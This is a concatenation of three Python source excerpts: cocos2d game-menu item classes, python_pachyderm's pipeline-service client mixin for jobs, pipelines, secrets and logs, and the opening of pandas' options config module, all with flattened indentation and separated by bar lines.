if isinstance(image, string_types):
image = pyglet.resource.image(image)
self.image = image
super (ImageMenuItem, self).__init__(callback_func, *args, **kwargs)
def generateWidgets (self, pos_x, pos_y, font_item, font_item_selected):
anchors = {'left': 0, 'center': 0.5, 'right': 1, 'top': 1, 'bottom': 0}
anchor=(anchors[font_item['anchor_x']] * self.image.width,
anchors[font_item['anchor_y']] * self.image.height)
self.item = Sprite(self.image, anchor=anchor, opacity=255,
color=font_item['color'][:3])
self.item.scale = font_item['font_size'] / float(self.item.height )
self.item.position = int(pos_x), int(pos_y)
self.selected_item = Sprite(self.image, anchor=anchor,
color=font_item_selected['color'][:3])
self.selected_item.scale = (font_item_selected['font_size'] /
float(self.selected_item.height))
self.selected_item.position = int(pos_x), int(pos_y)
def draw (self):
glPushMatrix()
self.transform()
if self.is_selected:
self.selected_item.draw()
else:
self.item.draw()
glPopMatrix()
class MultipleMenuItem( MenuItem ):
"""A menu item for switching between multiple values.
Example::
self.volumes = ['Mute','10','20','30','40','50','60','70','80','90','100']
items.append( MultipleMenuItem(
'SFX volume: ',
self.on_sfx_volume,
self.volumes,
8 ) )
"""
def __init__(self, label, callback_func, items, default_item=0):
"""Creates a Multiple Menu Item
:Parameters:
`label` : string
Item's label
`callback_func` : function
Callback function
`items` : list
List of strings containing the values
`default_item` : integer
Default item of the list. It is an index of the list. Default: 0
"""
self.my_label = label
self.items = items
self.idx = default_item
if self.idx < 0 or self.idx >= len(self.items):
raise Exception("Index out of bounds")
super( MultipleMenuItem, self).__init__( self._get_label(), callback_func )
def _get_label(self):
return self.my_label+self.items[self.idx]
def on_key_press(self, symbol, modifiers):
if symbol == key.LEFT:
self.idx = max(0, self.idx-1)
elif symbol in (key.RIGHT, key.ENTER):
self.idx = min(len(self.items)-1, self.idx+1)
if symbol in (key.LEFT, key.RIGHT, key.ENTER):
self.item.text = self._get_label()
self.item_selected.text = self._get_label()
self.callback_func( self.idx )
return True
class ToggleMenuItem( MultipleMenuItem ):
'''A menu item for a boolean toggle option.
Example::
items.append( ToggleMenuItem('Show FPS:', self.on_show_fps, director.show_FPS) )
'''
def __init__(self, label, callback_func, value=False ):
"""Creates a Toggle Menu Item
:Parameters:
`label` : string
Item's label
`callback_func` : function
Callback function
`value` : bool
Default value of the item: False is 'OFF', True is 'ON'. Default:False
"""
super(ToggleMenuItem, self).__init__( label, callback_func, ['OFF','ON'], int(value) )
def on_key_press( self, symbol, mod ):
if symbol in (key.LEFT, key.RIGHT, key.ENTER):
self.idx += 1
if self.idx > 1:
self.idx = 0
self.item.text = self._get_label()
self.item_selected.text = self._get_label()
self.callback_func( int(self.idx) )
return True
class EntryMenuItem(MenuItem):
"""A menu item for entering a value.
When selected, ``self.value`` is toggled, the callback function is
called with ``self.value`` as argument."""
value = property(lambda self: u''.join(self._value),
lambda self, v: setattr(self, '_value', list(v)))
def __init__(self, label, callback_func, value, max_length=0 ):
"""Creates an Entry Menu Item
:Parameters:
`label` : string
Item's label
`callback_func` : function
Callback function taking one argument.
`value` : String
Default value: any string
`max_length` : integer
Maximum value length (defaults to 0 for unbounded length)
"""
self._value = list(value)
self._label = label
super(EntryMenuItem, self).__init__( "%s %s" %(label,value), callback_func )
self.max_length = max_length
def on_text( self, text ):
if self.max_length == 0 or len(self._value) < self.max_length:
self._value.append(text)
self._calculate_value()
return True
def on_key_press(self, symbol, modifiers):
if symbol == key.BACKSPACE:
try:
self._value.pop()
except IndexError:
pass
self._calculate_value()
return True
def _calculate_value( self ):
self.callback_func(self.value)
new_text = u"%s %s" % (self._label, self.value)
self.item.text = new_text
self.item_selected.text = new_text
class ColorMenuItem( MenuItem ):
"""A menu item for selecting a color.
Example::
colors = [(255, 255, 255), (100, 200, 100), (200, 50, 50)]
items.append( ColorMenuItem(
'Jacket:',
self.on_jacket_color,
colors ))
"""
def __init__(self, label, callback_func, items, default_item=0):
"""Creates a Color Menu Item
:Parameters:
`label` : string
Item's label
`callback_func` : function
Callback function
`items` : list
List of three-element tuples describing the color choices
`default_item` : integer
Default item of the list. It is an index of the list. Default: 0
"""
self.my_label = label
self.items = items
self.idx = default_item
if self.idx < 0 or self.idx >= len(self.items):
raise Exception("Index out of bounds")
super( ColorMenuItem, self).__init__( self._get_label(), callback_func )
def _get_label(self):
return self.my_label + " "
def on_key_press(self, symbol, modifiers):
if symbol == key.LEFT:
self.idx = max(0, self.idx-1)
elif symbol in (key.RIGHT, key.ENTER):
self.idx = min(len(self.items)-1, self.idx+1)
if symbol in (key.LEFT, key.RIGHT, key.ENTER):
self.item.text = self._get_label()
self.item_selected.text = self._get_label()
self.callback_func( self.idx )
return True
def generateWidgets (self, pos_x, pos_y, font_item, font_item_selected):
font_item['x'] = int(pos_x)
font_item['y'] = int(pos_y)
font_item['text'] = self.my_label
self.item = pyglet.text.Label(**font_item )
self.item.labelWidth=self.item.content_width
self.item.text = self.label
font_item_selected['x'] = int(pos_x)
font_item_selected['y'] = int(pos_y)
font_item_selected['text'] = self.my_label
self.item_selected = pyglet.text.Label( **font_item_selected )
self.item_selected.labelWidth=self.item_selected.content_width
self.item_selected.text = self.label
def draw(self, *args, **kwargs):
super(ColorMenuItem, self).draw()
glPushMatrix()
self.transform()
if self.is_selected:
item = self.item_selected
else:
item = self.item
x1 = int(item._get_left() + item.labelWidth * 1.05)
y1 = int(item.y - item.content_height // 2)
y2 = int(item.y + item.content_height // 3)
x2 = int(x1 + (y2 - y1) * 2)
pyglet.graphics.draw(4, pyglet.graphics.GL_QUADS,
('v2f', (x1, y1, x1, y2, x2, y2, x2, y1)),
('c3B', self.items[self.idx] * 4))
glPopMatrix()
def shake():
'''Predefined action that performs a slight rotation and then goes back to the original rotation
position.
'''
angle = 5
duration = 0.05
rot = Accelerate(RotateBy( angle, duration ), 2)
rot2 = Accelerate(RotateBy( -angle*2, duration), 2)
return rot + (rot2 + Reverse(rot2)) * 2 + Reverse(rot)
def shake_back():
'''Predefined action that rotates to 0 degrees in 0.1 seconds'''
return RotateTo(0,0.1)
def zoom_in():
'''Predefined action that scales to 1.5 factor in 0.2 seconds'''
return ScaleTo( 1.5, duration=0.2 )
def zoom_out():
'''Predefined action that scales to 1.0 factor in 0.2 seconds'''
return ScaleTo( 1.0, duration=0.2 )
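# --- Usage sketch (added for illustration; not part of the original module) ---
# Subclassing `Menu` as the module docstring describes. The class name and the
# callbacks below are assumptions; running it requires a working cocos2d setup
# (director.init() and a Scene containing the layer).
class _ExampleMenu(Menu):
    def __init__(self):
        super(_ExampleMenu, self).__init__("Example")
        items = [
            MenuItem('Start', self.on_start),
            ToggleMenuItem('Sound: ', self.on_sound, True),
            EntryMenuItem('Name: ', self.on_name, 'player', max_length=12),
            MenuItem('Quit', self.on_quit),
        ]
        self.create_menu(items, zoom_in(), zoom_out())

    def on_start(self):
        print("start selected")

    def on_sound(self, value):
        print("sound enabled:", bool(value))

    def on_name(self, value):
        print("player name:", value)

    def on_quit(self):
        pyglet.app.exit()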
|
|
import json
import base64
from typing import Dict, Iterator, List, Union
from python_pachyderm.pfs import commit_from, SubcommitType
from python_pachyderm.service import Service, pps_proto, pfs_proto
from google.protobuf import empty_pb2, duration_pb2
class PPSMixin:
"""A mixin for pps-related functionality."""
def inspect_job(
self,
job_id: str,
pipeline_name: str = None,
wait: bool = False,
details: bool = False,
) -> Iterator[pps_proto.JobInfo]:
"""Inspects a job.
Parameters
----------
job_id : str
The ID of the job.
pipeline_name : str, optional
The name of a pipeline.
wait : bool, optional
If true, wait until the job completes.
details : bool, optional
If true, return worker details.
Returns
-------
Iterator[pps_proto.JobInfo]
An iterator of protobuf objects that contain info on a subjob
(jobs at the pipeline-level).
Examples
--------
>>> # Look at all subjobs in a job
>>> subjobs = list(client.inspect_job("467c580611234cdb8cc9758c7aa96087"))
...
>>> # Look at single subjob (job at the pipeline-level)
>>> subjob = list(client.inspect_job("467c580611234cdb8cc9758c7aa96087", "foo"))[0]
.. # noqa: W505
"""
if pipeline_name is not None:
return iter(
[
self._req(
Service.PPS,
"InspectJob",
job=pps_proto.Job(
pipeline=pps_proto.Pipeline(name=pipeline_name), id=job_id
),
wait=wait,
details=details,
)
]
)
else:
return self._req(
Service.PPS,
"InspectJobSet",
job_set=pps_proto.JobSet(id=job_id),
wait=wait,
details=details,
)
def list_job(
self,
pipeline_name: str = None,
input_commit: SubcommitType = None,
history: int = 0,
details: bool = False,
jqFilter: str = None,
) -> Union[Iterator[pps_proto.JobInfo], Iterator[pps_proto.JobSetInfo]]:
"""Lists jobs.
Parameters
----------
pipeline_name : str, optional
The name of a pipeline. If set, returns subjobs (job at the
pipeline-level) only from this pipeline.
input_commit : SubcommitType, optional
A commit or list of commits from the input repo to filter jobs on.
Only impacts returned results if `pipeline_name` is specified.
history : int, optional
Indicates to return jobs from historical versions of
`pipeline_name`. Semantics are:
- 0: Return jobs from the current version of `pipeline_name`
- 1: Return the above and jobs from the next most recent version
- 2: etc.
- -1: Return jobs from all historical versions of `pipeline_name`
details : bool, optional
If true, return pipeline details for `pipeline_name`. Leaving this
``None`` (or ``False``) can make the call significantly faster in
clusters with a large number of pipelines and jobs. Note that if
`input_commit` is valid, this field is coerced to `True`.
jqFilter : str, optional
A ``jq`` filter that can filter the list of jobs returned, only if
`pipeline_name` is provided.
Returns
-------
Union[Iterator[pps_proto.JobInfo], Iterator[pps_proto.JobSetInfo]]
An iterator of protobuf objects that either contain info on a
subjob (job at the pipeline-level), if `pipeline_name` was
specified, or a job, if `pipeline_name` wasn't specified.
Examples
--------
>>> # List all jobs
>>> jobs = list(client.list_job())
...
>>> # List all jobs at a pipeline-level
>>> subjobs = list(client.list_job("foo"))
.. # noqa: W505
"""
if pipeline_name is not None:
if isinstance(input_commit, list):
input_commit = [commit_from(ic) for ic in input_commit]
elif input_commit is not None:
input_commit = [commit_from(input_commit)]
return self._req(
Service.PPS,
"ListJob",
pipeline=pps_proto.Pipeline(name=pipeline_name),
input_commit=input_commit,
history=history,
details=details,
jqFilter=jqFilter,
)
else:
return self._req(
Service.PPS,
"ListJobSet",
details=details,
)
def delete_job(self, job_id: str, pipeline_name: str) -> None:
"""Deletes a subjob (job at the pipeline-level).
Parameters
----------
job_id : str
The ID of the job.
pipeline_name : str
The name of the pipeline.
"""
self._req(
Service.PPS,
"DeleteJob",
job=pps_proto.Job(
pipeline=pps_proto.Pipeline(name=pipeline_name), id=job_id
),
)
def stop_job(self, job_id: str, pipeline_name: str, reason: str = None) -> None:
"""Stops a subjob (job at the pipeline-level).
Parameters
----------
job_id : str
The ID of the job.
pipeline_name : str
The name of the pipeline.
reason : str, optional
A reason for stopping the job.
"""
self._req(
Service.PPS,
"StopJob",
job=pps_proto.Job(
pipeline=pps_proto.Pipeline(name=pipeline_name), id=job_id
),
reason=reason,
)
def inspect_datum(
self, pipeline_name: str, job_id: str, datum_id: str
) -> pps_proto.DatumInfo:
"""Inspects a datum.
Parameters
----------
pipeline_name : str
The name of the pipeline.
job_id : str
The ID of the job.
datum_id : str
The ID of the datum.
Returns
-------
pps_proto.DatumInfo
A protobuf object with info on the datum.
"""
return self._req(
Service.PPS,
"InspectDatum",
datum=pps_proto.Datum(
id=datum_id,
job=pps_proto.Job(
pipeline=pps_proto.Pipeline(name=pipeline_name), id=job_id
),
),
)
def list_datum(
self,
pipeline_name: str = None,
job_id: str = None,
input: pps_proto.Input = None,
) -> Iterator[pps_proto.DatumInfo]:
"""Lists datums. Exactly one of (`pipeline_name`, `job_id`) (real) or
`input` (hypothetical) must be set.
Parameters
----------
pipeline_name : str, optional
The name of the pipeline.
job_id : str, optional
The ID of a job.
input : pps_proto.Input, optional
A protobuf object that filters the datums returned. The datums
listed are ones that would be run if a pipeline was created with
the provided input.
Returns
-------
Iterator[pps_proto.DatumInfo]
An iterator of protobuf objects that contain info on a datum.
Examples
--------
>>> # See hypothetical datums with specified input cross
>>> datums = list(client.list_datum(input=pps_proto.Input(
... pfs=pps_proto.PFSInput(repo="foo", branch="master", glob="/*"),
... cross=[
... pps_proto.Input(pfs=pps_proto.PFSInput(repo="bar", branch="master", glob="/")),
... pps_proto.Input(pfs=pps_proto.PFSInput(repo="baz", branch="master", glob="/*/*")),
... ]
... )))
.. # noqa: W505
"""
req = pps_proto.ListDatumRequest()
if pipeline_name is not None and job_id is not None:
req.job.CopyFrom(
pps_proto.Job(
pipeline=pps_proto.Pipeline(name=pipeline_name), id=job_id
)
)
else:
req.input.CopyFrom(input)
return self._req(Service.PPS, "ListDatum", req=req)
def restart_datum(
self, pipeline_name: str, job_id: str, data_filters: List[str] = None
) -> None:
"""Restarts a datum.
Parameters
----------
pipeline_name : str
The name of the pipeline.
job_id : str
The ID of the job.
data_filters : List[str], optional
A list of paths or hashes of datums that filter which datums are
restarted.
"""
self._req(
Service.PPS,
"RestartDatum",
job=pps_proto.Job(
pipeline=pps_proto.Pipeline(name=pipeline_name), id=job_id
),
data_filters=data_filters,
)
def create_pipeline(
self,
pipeline_name: str,
transform: pps_proto.Transform,
parallelism_spec: pps_proto.ParallelismSpec = None,
egress: pps_proto.Egress = None,
reprocess_spec: str = None,
update: bool = False,
output_branch_name: str = None,
s3_out: bool = False,
resource_requests: pps_proto.ResourceSpec = None,
resource_limits: pps_proto.ResourceSpec = None,
sidecar_resource_limits: pps_proto.ResourceSpec = None,
input: pps_proto.Input = None,
description: str = None,
reprocess: bool = False,
service: pps_proto.Service = None,
datum_set_spec: pps_proto.DatumSetSpec = None,
datum_timeout: duration_pb2.Duration = None,
job_timeout: duration_pb2.Duration = None,
salt: str = None,
datum_tries: int = 3,
scheduling_spec: pps_proto.SchedulingSpec = None,
pod_patch: str = None,
spout: pps_proto.Spout = None,
spec_commit: pfs_proto.Commit = None,
metadata: pps_proto.Metadata = None,
autoscaling: bool = False,
) -> None:
"""Creates a pipeline.
For info on the params, please refer to the pipeline spec document:
http://docs.pachyderm.io/en/latest/reference/pipeline_spec.html
Parameters
----------
pipeline_name : str
The pipeline name.
transform : pps_proto.Transform
The image and commands run during pipeline execution.
parallelism_spec : pps_proto.ParallelismSpec, optional
Specifies how the pipeline is parallelized.
egress : pps_proto.Egress, optional
An external data store to publish the results of the pipeline to.
reprocess_spec : str, optional
Specifies how to handle already-processed datums.
update : bool, optional
If true, updates the existing pipeline with new args.
output_branch_name : str, optional
The branch name to output results on.
s3_out : bool, optional
If true, the output repo is exposed as an S3 gateway bucket.
resource_requests : pps_proto.ResourceSpec, optional
The amount of resources that the pipeline workers will consume.
resource_limits: pps_proto.ResourceSpec, optional
The upper threshold of allowed resources a given worker can
consume. If a worker exceeds this value, it will be evicted.
sidecar_resource_limits : pps_proto.ResourceSpec, optional
The upper threshold of resources allocated to the sidecar
containers.
input : pps_proto.Input, optional
The input repos to the pipeline. Commits to these repos will
automatically trigger the pipeline to create new jobs to
process them.
description : str, optional
A description of the pipeline.
reprocess : bool, optional
If true, forces the pipeline to reprocess all datums. Only has
meaning if `update` is ``True``.
service : pps_proto.Service, optional
Creates a Service pipeline instead of a normal pipeline.
datum_set_spec : pps_proto.DatumSetSpec, optional
Specifies how a pipeline should split its datums into datum sets.
datum_timeout : duration_pb2.Duration, optional
The maximum execution time allowed for each datum.
job_timeout : duration_pb2.Duration, optional
The maximum execution time allowed for a job.
salt : str, optional
A tag for the pipeline.
datum_tries : int, optional
The number of times a job attempts to run on a datum when a failure
occurs.
scheduling_spec : pps_proto.SchedulingSpec, optional
Specifies how the pods for a pipeline should be scheduled.
pod_patch : str, optional
Allows one to set fields in the pod spec that haven't been
explicitly exposed in the rest of the pipeline spec.
spout : pps_proto.Spout, optional
Creates a Spout pipeline instead of a normal pipeline.
spec_commit : pfs_proto.Commit, optional
A spec commit to base the pipeline spec from.
metadata : pps_proto.Metadata, optional
Kubernetes labels and annotations to add as metadata to the
pipeline pods.
autoscaling : bool, optional
If true, automatically scales the worker pool based on the datums
it has to process.
Notes
-----
If creating a Spout pipeline, when committing data to the repo, use
commit methods (``client.commit()``, ``client.start_commit()``, etc.)
or :class:`.ModifyFileClient` methods (``mfc.put_file_from_bytes``,
``mfc.delete_file()``, etc.)
For other pipelines, when committing data to the repo, write out to
``/pfs/out/``.
Examples
--------
>>> client.create_pipeline(
... "foo",
... transform=pps_proto.Transform(
... cmd=["python3", "main.py"],
... image="example/image",
... ),
... input=pps_proto.Input(pfs=pps_proto.PFSInput(
... repo="foo",
... branch="master",
... glob="/*"
... ))
... )
"""
self._req(
Service.PPS,
"CreatePipeline",
pipeline=pps_proto.Pipeline(name=pipeline_name),
transform=transform,
parallelism_spec=parallelism_spec,
egress=egress,
update=update,
output_branch=output_branch_name,
s3_out=s3_out,
resource_requests=resource_requests,
resource_limits=resource_limits,
sidecar_resource_limits=sidecar_resource_limits,
input=input,
description=description,
reprocess=reprocess,
metadata=metadata,
service=service,
datum_set_spec=datum_set_spec,
datum_timeout=datum_timeout,
job_timeout=job_timeout,
salt=salt,
datum_tries=datum_tries,
scheduling_spec=scheduling_spec,
pod_patch=pod_patch,
spout=spout,
spec_commit=spec_commit,
reprocess_spec=reprocess_spec,
autoscaling=autoscaling,
)
def create_pipeline_from_request(
self, req: pps_proto.CreatePipelineRequest
) -> None:
"""Creates a pipeline from a ``CreatePipelineRequest`` object. Usually
used in conjunction with ``util.parse_json_pipeline_spec()`` or
``util.parse_dict_pipeline_spec()``.
Parameters
----------
req : pps_proto.CreatePipelineRequest
The ``CreatePipelineRequest`` object.
"""
self._req(Service.PPS, "CreatePipeline", req=req)
def inspect_pipeline(
self, pipeline_name: str, history: int = 0, details: bool = False
) -> Iterator[pps_proto.PipelineInfo]:
""".. # noqa: W505
Inspects a pipeline.
Parameters
----------
pipeline_name : str
The name of the pipeline.
history : int, optional
Indicates to return historical versions of `pipeline_name`.
Semantics are:
- 0: Return current version of `pipeline_name`
- 1: Return the above and `pipeline_name` from the next most recent version.
- 2: etc.
- -1: Return all historical versions of `pipeline_name`.
details : bool, optional
If true, return pipeline details.
Returns
-------
Iterator[pps_proto.PipelineInfo]
An iterator of protobuf objects that contain info on a pipeline.
Examples
--------
>>> pipeline = next(client.inspect_pipeline("foo"))
...
>>> for p in client.inspect_pipeline("foo", 2):
>>> print(p)
"""
if history == 0:
return iter(
[
self._req(
Service.PPS,
"InspectPipeline",
pipeline=pps_proto.Pipeline(name=pipeline_name),
details=details,
)
]
)
else:
# `InspectPipeline` doesn't support history, but `ListPipeline`
# with a pipeline filter does, so we use that here
return self._req(
Service.PPS,
"ListPipeline",
pipeline=pps_proto.Pipeline(name=pipeline_name),
history=history,
details=details,
)
def list_pipeline(
self, history: int = 0, details: bool = False, jqFilter: str = None
) -> Iterator[pps_proto.PipelineInfo]:
""".. # noqa: W505
Lists pipelines.
Parameters
----------
history : int, optional
Indicates to return historical versions of `pipeline_name`.
Semantics are:
- 0: Return current version of `pipeline_name`
- 1: Return the above and `pipeline_name` from the next most recent version.
- 2: etc.
- -1: Return all historical versions of `pipeline_name`.
details : bool, optional
If true, return pipeline details.
jqFilter : str, optional
A ``jq`` filter that can filter the list of pipelines returned.
Returns
-------
Iterator[pps_proto.PipelineInfo]
An iterator of protobuf objects that contain info on a pipeline.
Examples
--------
>>> pipelines = list(client.list_pipeline())
"""
return self._req(
Service.PPS,
"ListPipeline",
history=history,
details=details,
jqFilter=jqFilter,
)
def delete_pipeline(
self, pipeline_name: str, force: bool = False, keep_repo: bool = False
) -> None:
"""Deletes a pipeline.
Parameters
----------
pipeline_name : str
The name of the pipeline.
force : bool, optional
If true, forces the pipeline deletion.
keep_repo : bool, optional
If true, keeps the output repo.
"""
self._req(
Service.PPS,
"DeletePipeline",
pipeline=pps_proto.Pipeline(name=pipeline_name),
force=force,
keep_repo=keep_repo,
)
def delete_all_pipelines(self) -> None:
"""Deletes all pipelines."""
self._req(
Service.PPS,
"DeleteAll",
req=empty_pb2.Empty(),
)
def start_pipeline(self, pipeline_name: str) -> None:
"""Starts a pipeline.
Parameters
----------
pipeline_name : str
The name of the pipeline.
"""
self._req(
Service.PPS,
"StartPipeline",
pipeline=pps_proto.Pipeline(name=pipeline_name),
)
def stop_pipeline(self, pipeline_name: str) -> None:
"""Stops a pipeline.
Parameters
----------
pipeline_name : str
The name of the pipeline.
"""
self._req(
Service.PPS, "StopPipeline", pipeline=pps_proto.Pipeline(name=pipeline_name)
)
def run_cron(self, pipeline_name: str) -> None:
"""Triggers a cron pipeline to run now.
For more info on cron pipelines:
https://docs.pachyderm.com/latest/concepts/pipeline-concepts/pipeline/cron/
Parameters
----------
pipeline_name : str
The name of the pipeline.
"""
self._req(
Service.PPS,
"RunCron",
pipeline=pps_proto.Pipeline(name=pipeline_name),
)
def create_secret(
self,
secret_name: str,
data: Dict[str, Union[str, bytes]],
labels: Dict[str, str] = None,
annotations: Dict[str, str] = None,
) -> None:
"""Creates a new secret.
Parameters
----------
secret_name : str
The name of the secret.
data : Dict[str, Union[str, bytes]]
The data to store in the secret. Each key must consist of
alphanumeric characters ``-``, ``_`` or ``.``.
labels : Dict[str, str], optional
Kubernetes labels to attach to the secret.
annotations : Dict[str, str], optional
Kubernetes annotations to attach to the secret.
"""
encoded_data = {}
for k, v in data.items():
if isinstance(v, str):
v = v.encode("utf8")
encoded_data[k] = base64.b64encode(v).decode("utf8")
f = json.dumps(
{
"kind": "Secret",
"apiVersion": "v1",
"metadata": {
"name": secret_name,
"labels": labels,
"annotations": annotations,
},
"data": encoded_data,
}
).encode("utf8")
self._req(Service.PPS, "CreateSecret", file=f)
def delete_secret(self, secret_name: str) -> None:
"""Deletes a secret.
Parameters
----------
secret_name : str
The name of the secret.
"""
secret = pps_proto.Secret(name=secret_name)
self._req(Service.PPS, "DeleteSecret", secret=secret)
def list_secret(self) -> List[pps_proto.SecretInfo]:
"""Lists secrets.
Returns
-------
List[pps_proto.SecretInfo]
A list of protobuf objects that contain info on a secret.
"""
return self._req(
Service.PPS,
"ListSecret",
req=empty_pb2.Empty(),
).secret_info
def inspect_secret(self, secret_name: str) -> pps_proto.SecretInfo:
"""Inspects a secret.
Parameters
----------
secret_name : str
The name of the secret.
Returns
-------
pps_proto.SecretInfo
A protobuf object with info on the secret.
"""
secret = pps_proto.Secret(name=secret_name)
return self._req(Service.PPS, "InspectSecret", secret=secret)
def get_pipeline_logs(
self,
pipeline_name: str,
data_filters: List[str] = None,
master: bool = False,
datum: pps_proto.Datum = None,
follow: bool = False,
tail: int = 0,
use_loki_backend: bool = False,
since: duration_pb2.Duration = None,
) -> Iterator[pps_proto.LogMessage]:
"""Gets logs for a pipeline.
Parameters
----------
pipeline_name : str
The name of the pipeline.
data_filters : List[str], optional
A list of the names of input files from which we want processing
logs. This may contain multiple files, in case `pipeline_name`
contains multiple inputs. Each filter may be an absolute path of a
file within a repo, or it may be a hash for that file (to search
for files at specific versions).
master : bool, optional
If true, includes logs from the master
datum : pps_proto.Datum, optional
Filters log lines for the specified datum.
follow : bool, optional
If true, continue to follow new logs as they appear.
tail : int, optional
If nonzero, the number of lines from the end of the logs to return.
Note: tail applies per container, so you will get
`tail` * <number of pods> total lines back.
use_loki_backend : bool, optional
If true, use loki as a backend, rather than Kubernetes, for
fetching logs. Requires a loki-enabled cluster.
since : duration_pb2.Duration, optional
Specifies how far in the past to return logs from.
Returns
-------
Iterator[pps_proto.LogMessage]
An iterator of protobuf objects that contain info on a log from a
PPS worker. If `follow` is set to ``True``, use ``next()`` to
iterate through as the returned stream is potentially endless.
Might block your code otherwise.
"""
return self._req(
Service.PPS,
"GetLogs",
pipeline=pps_proto.Pipeline(name=pipeline_name),
data_filters=data_filters,
master=master,
datum=datum,
follow=follow,
tail=tail,
use_loki_backend=use_loki_backend,
since=since,
)
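# Illustrative call (assumed pipeline name; not from the original module). With
# follow=True the stream is potentially endless, so pull messages one at a time:
#
#   logs = client.get_pipeline_logs("foo", follow=True)
#   message = next(logs)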
def get_job_logs(
self,
pipeline_name: str,
job_id: str,
data_filters: List[str] = None,
datum: pps_proto.Datum = None,
follow: bool = False,
tail: int = 0,
use_loki_backend: bool = False,
since: duration_pb2.Duration = None,
) -> Iterator[pps_proto.LogMessage]:
"""Gets logs for a job.
Parameters
----------
pipeline_name : str
The name of the pipeline.
job_id : str
The ID of the job.
data_filters : List[str], optional
A list of the names of input files from which we want processing
logs. This may contain multiple files, in case `pipeline_name`
contains multiple inputs. Each filter may be an absolute path of a
file within a repo, or it may be a hash for that file (to search
for files at specific versions).
datum : pps_proto.Datum, optional
Filters log lines for the specified datum.
follow : bool, optional
If true, continue to follow new logs as they appear.
tail : int, optional
If nonzero, the number of lines from the end of the logs to return.
Note: tail applies per container, so you will get
`tail` * <number of pods> total lines back.
use_loki_backend : bool, optional
If true, use loki as a backend, rather than Kubernetes, for
fetching logs. Requires a loki-enabled cluster.
since : duration_pb2.Duration, optional
Specifies how far in the past to return logs from.
Returns
-------
Iterator[pps_proto.LogMessage]
An iterator of protobuf objects that contain info on a log from a
PPS worker. If `follow` is set to ``True``, use ``next()`` to
iterate through as the returned stream is potentially endless.
Might block your code otherwise.
"""
return self._req(
Service.PPS,
"GetLogs",
job=pps_proto.Job(
pipeline=pps_proto.Pipeline(name=pipeline_name), id=job_id
),
data_filters=data_filters,
datum=datum,
follow=follow,
tail=tail,
use_loki_backend=use_loki_backend,
since=since,
)
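# --- Usage sketch (added for illustration; not part of the original module) ---
# Assumes a python_pachyderm.Client (which mixes in PPSMixin) and a reachable
# pachd instance; the repo, image and pipeline names below are assumptions.
if __name__ == "__main__":
    import python_pachyderm

    client = python_pachyderm.Client()
    client.create_pipeline(
        "word-count",
        transform=pps_proto.Transform(
            cmd=["python3", "main.py"],
            image="example/word-count",
        ),
        input=pps_proto.Input(
            pfs=pps_proto.PFSInput(repo="documents", branch="master", glob="/*")
        ),
    )
    for pipeline in client.list_pipeline():
        print(pipeline.pipeline.name, pipeline.state)
    for job in client.list_job(pipeline_name="word-count"):
        print(job.job.id, job.state)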
|
|
"""
The config module holds package-wide configurables and provides
a uniform API for working with them.
Overview
========
This module supports the following requirements:
- options are referenced using keys in dot.notation, e.g. "x.y.option - z".
- keys are case-insensitive.
- functions should accept partial/regex keys, when unambiguous.
- options can be registered by modules at import time.
- options can be registered at init-time (via core.config_init)
- options have a default value, and (optionally) a description and
validation function associated with them.
- options can be deprecated, in which case referencing them
should produce a warning.
- deprecated options can optionally be rerouted to a replacement
so that accessing a deprecated option reroutes to a differently
named option.
- options can be reset to their default value.
- all options can be reset to their default value at once.
- all options in a certain sub - namespace can be reset at once.
- the user can set / get / reset or ask for the description of an option.
- a developer can register and mark an option as deprecated.
- you can register a callback to be invoked when the option value
is set or reset. Changing the stored value is considered misuse, but
is not verboten.
Implementation
==============
- Data is stored using nested dictionaries, and should be accessed
through the provided API.
- "Registered options" and "Deprecated options" have metadata associated
with them, which are stored in auxiliary dictionaries keyed on the
fully-qualified key, e.g. "x.y.z.option".
- the config_init module is imported by the package's __init__.py file.
placing any register_option() calls there will ensure those options
are available as soon as pandas is loaded. If you use register_option
in a module, it will only be available after that module is imported,
which you should be aware of.
- `config_prefix` is a context_manager (for use with the `with` keyword)
which can save developers some typing, see the docstring.
"""
import re
from collections import namedtuple
from contextlib import contextmanager
import warnings
from pandas.compat import map, lmap, u
import pandas.compat as compat
DeprecatedOption = namedtuple('DeprecatedOption', 'key msg rkey removal_ver')
RegisteredOption = namedtuple('RegisteredOption',
'key defval doc validator cb')
_deprecated_options = {} # holds deprecated option metadata
_registered_options = {} # holds registered option metadata
_global_config = {} # holds the current values for registered options
_reserved_keys = ['all'] # keys which have a special meaning
class OptionError(AttributeError, KeyError):
"""Exception for pandas.options, backwards compatible with KeyError
checks
"""
#
# User API
def _get_single_key(pat, silent):
keys = _select_options(pat)
if len(keys) == 0:
if not silent:
_warn_if_deprecated(pat)
raise OptionError('No such key(s): {pat!r}'.format(pat=pat))
if len(keys) > 1:
raise OptionError('Pattern matched multiple keys')
key = keys[0]
if not silent:
_warn_if_deprecated(key)
key = _translate_key(key)
return key
def _get_option(pat, silent=False):
key = _get_single_key(pat, silent)
# walk the nested dict
root, k = _get_root(key)
return root[k]
def _set_option(*args, **kwargs):
# must have at least 1 arg; deal with constraints later
nargs = len(args)
if not nargs or nargs % 2 != 0:
raise ValueError("Must provide an even number of non-keyword "
"arguments")
# default to false
silent = kwargs.pop('silent', False)
if kwargs:
msg = '_set_option() got an unexpected keyword argument "{kwarg}"'
raise TypeError(msg.format(kwarg=list(kwargs.keys())[0]))
for k, v in zip(args[::2], args[1::2]):
key = _get_single_key(k, silent)
o = _get_registered_option(key)
if o and o.validator:
o.validator(v)
# walk the nested dict
root, k = _get_root(key)
root[k] = v
if o.cb:
if silent:
with warnings.catch_warnings(record=True):
o.cb(key)
else:
o.cb(key)
def _describe_option(pat='', _print_desc=True):
keys = _select_options(pat)
if len(keys) == 0:
raise OptionError('No such key(s)')
s = u('')
for k in keys: # filter by pat
s += _build_option_description(k)
if _print_desc:
print(s)
else:
return s
def _reset_option(pat, silent=False):
keys = _select_options(pat)
if len(keys) == 0:
raise OptionError('No such key(s)')
if len(keys) > 1 and len(pat) < 4 and pat != 'all':
raise ValueError('You must specify at least 4 characters when '
'resetting multiple keys, use the special keyword '
'"all" to reset all the options to their default '
'value')
for k in keys:
_set_option(k, _registered_options[k].defval, silent=silent)
def get_default_val(pat):
key = _get_single_key(pat, silent=True)
return _get_registered_option(key).defval
class DictWrapper(object):
""" provide attribute-style access to a nested dict"""
def __init__(self, d, prefix=""):
object.__setattr__(self, "d", d)
object.__setattr__(self, "prefix", prefix)
def __setattr__(self, key, val):
prefix = object.__getattribute__(self, "prefix")
if prefix:
prefix += "."
prefix += key
# you can't set new keys
# and you can't overwrite subtrees
if key in self.d and not isinstance(self.d[key], dict):
_set_option(prefix, val)
else:
